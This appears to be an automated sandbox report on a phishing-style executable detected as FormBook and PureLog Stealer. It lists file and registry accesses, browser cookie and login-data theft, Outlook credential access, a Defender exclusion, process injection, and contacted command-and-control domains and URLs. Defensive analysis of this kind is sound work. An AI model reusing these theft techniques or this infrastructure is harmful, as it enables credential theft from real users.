Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 4.2.PO -2025918.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.PO -2025918.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3539953830.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3543046045.0000000005840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2126495744.0000000002050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3540990423.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Yara detected PureLog Stealer
Source: Yara match File source: 0.2.PO -2025918.exe.7040000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.3777590.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.7040000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.2b71520.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.3777590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.2b71520.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.294f714.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1870856601.0000000003759000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1892212304.0000000007040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1865271514.00000000027A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\ROUTE.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 4.2.PO -2025918.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.PO -2025918.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3539953830.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3543046045.0000000005840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2126495744.0000000002050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3540990423.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Yara detected PureLog Stealer
Source: Yara match File source: 0.2.PO -2025918.exe.7040000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.3777590.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.7040000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.2b71520.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.3777590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.2b71520.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.294f714.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1870856601.0000000003759000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1892212304.0000000007040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1865271514.00000000027A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1592062 Sample: PO -2025918.exe Startdate: 15/01/2025 Architecture: WINDOWS Score: 100 35 www.letsbookcruise.xyz 2->35 37 www.zucchini.pro 2->37 39 13 other IPs or domains 2->39 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected PureLog Stealer 2->49 51 Yara detected FormBook 2->51 55 5 other signatures 2->55 10 PO -2025918.exe 4 2->10         started        signatures3 53 Performs DNS queries to domains with low reputation 35->53 process4 file5 33 C:\Users\user\AppData\...\PO -2025918.exe.log, ASCII 10->33 dropped 67 Adds a directory exclusion to Windows Defender 10->67 14 PO -2025918.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 14->71 19 nWrCyfejRZk.exe 14->19 injected 73 Loading BitLocker PowerShell Module 17->73 22 conhost.exe 17->22         started        process9 signatures10 57 Found direct / indirect Syscall (likely to bypass EDR) 19->57 24 ROUTE.EXE 13 19->24         started        process11 signatures12 59 Tries to steal Mail credentials (via file / registry access) 24->59 61 Tries to harvest and steal browser information (history, passwords, etc) 24->61 63 Modifies the context of a thread in another process (thread injection) 24->63 65 3 other signatures 24->65 27 nWrCyfejRZk.exe 24->27 injected 31 firefox.exe 24->31         started        process13 dnsIp14 41 www.qzsazi.info 47.83.1.90, 50020, 50021, 50022 VODANETInternationalIP-BackboneofVodafoneDE United States 27->41 43 www.actionhub.live 67.223.117.189, 49980, 49999, 50014 VIMRO-AS15189US United States 27->43 45 6 other IPs or domains 27->45 69 Found direct / indirect Syscall (likely to bypass EDR) 27->69 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
13.248.169.48
 www.zucchini.pro United States
16509 AMAZON-02US false
67.223.117.189
 www.actionhub.live United States
15189 VIMRO-AS15189US false
188.114.97.3
 www.vh5g.sbs European Union
13335 CLOUDFLARENETUS false
47.83.1.90
 www.qzsazi.info United States
3209 VODANETInternationalIP-BackboneofVodafoneDE false
84.32.84.32
 truckgoway.info Lithuania
33922 NTT-LT-ASLT false
136.243.64.147
 100millionjobs.africa Germany
24940 HETZNER-ASDE false
85.159.66.93
 natroredirect.natrocdn.com Turkey
34619 CIZGITR false
213.171.195.105
 www.aloezhealthcare.info United Kingdom
8560 ONEANDONE-ASBrauerstrasse48DE false

Contacted Domains

Name IP Active
www.qzsazi.info 47.83.1.90 true
www.aloezhealthcare.info 213.171.195.105 true
truckgoway.info 84.32.84.32 true
www.zucchini.pro 13.248.169.48 true
www.vh5g.sbs 188.114.97.3 true
www.actionhub.live 67.223.117.189 true
100millionjobs.africa 136.243.64.147 true
natroredirect.natrocdn.com 85.159.66.93 true
www.100millionjobs.africa unknown unknown
www.v89ey584d.shop unknown unknown
www.truckgoway.info unknown unknown
www.letsbookcruise.xyz unknown unknown
www.x3kwqc5tye4vl90y.top unknown unknown
www.hwak.live unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.zucchini.pro/tqv2/?6NWT=ubtLSzl&V0=mw5EMDe107YJTqujAq9unz2dxFIqRcwx5FZV14wN+wWnYz/1vECwz9qX0523rVAHVbCkyePm1aNLCJN6m48zwwFGYhIaaAphRdYS1Kl1BiYSwcT5l1L9JEw= false
  • Avira URL Cloud: safe
 unknown
http://www.actionhub.live/gq43/ false
  • Avira URL Cloud: safe
 unknown
http://www.qzsazi.info/bqha/ false
  • Avira URL Cloud: safe
 unknown
http://www.qzsazi.info/bqha/?V0=XaQS++1s5Z2sQk6g657UrSdcX7H3EUdTMtu3zec/e2geVsN/mry3D0SmJYJJ828Xh6gONHNOHW6qADxKsznE6ZdUGRZN1xACtCVpUj7MYkJvH6jcy3tgXEM=&6NWT=ubtLSzl false
  • Avira URL Cloud: safe
 unknown
http://www.100millionjobs.africa/ktot/ false
  • Avira URL Cloud: safe
 unknown
http://www.aloezhealthcare.info/he9k/?V0=0MI6+xzwqxZaqD2fSvbI+Ez0sKo1K30QNU5KfAdCo3osKEpgr6ecWOPkYYCElD9/ZCs5VNg1QoXcN7il9gzOzrl593t+ZyNHd/O+D84ZuyAEiK4V6BaRopc=&6NWT=ubtLSzl false
  • Avira URL Cloud: safe
 unknown
http://www.truckgoway.info/m320/?V0=Ph0JwVcw7zzuTeHjokN+Pj0vqxzi/qoK5eH0o0l2w/5oKsNqReXVchdY7BGekisn6nC+H3gPoTPDUk5nD7LsnmjV2eR6T95oFo+TtC+4wolZhiL0ouse1nU=&6NWT=ubtLSzl false
  • Avira URL Cloud: safe
 unknown
http://www.aloezhealthcare.info/he9k/ false
  • Avira URL Cloud: safe
 unknown
http://www.letsbookcruise.xyz/coi2/ false
  • Avira URL Cloud: safe
 unknown
http://www.100millionjobs.africa/ktot/?6NWT=ubtLSzl&V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4ck6L30rZkuOCe6cRp9wSIOgnwHyHnoLuvl9s= false
  • Avira URL Cloud: safe
 unknown
http://www.truckgoway.info/m320/ false
  • Avira URL Cloud: safe
 unknown
http://www.vh5g.sbs/54nj/ false
  • Avira URL Cloud: safe
 unknown